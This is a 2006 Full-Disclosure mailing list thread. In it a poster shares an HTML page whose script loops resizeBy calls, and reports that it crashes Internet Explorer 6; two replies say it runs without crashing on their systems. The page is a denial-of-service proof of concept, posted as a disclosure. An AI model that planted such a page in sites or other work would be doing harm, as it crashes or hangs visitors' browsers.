win2k 6.0.2800.1106 (no crash) On 5/26/06, yuanfan bai <[EMAIL PROTECTED]> wrote:
In my winxp and win2k3 all run steadily, not any exception..2006/5/26, r k <[EMAIL PROTECTED]>: > Hi All, IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page. the following is the code ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ <html> <head> <title>Internet Explorer Ver 6.0.2800.1106</title> </head> <body> <script> var wwidth = (window.innerWidth)?window.innerWidth: ((document.all )?document.body.offsetWidth:null); while (wwidth) { self.resizeBy(-999999, -1); } </script> </body> </html> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ tested on windows 2000,windows XP thank you antar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
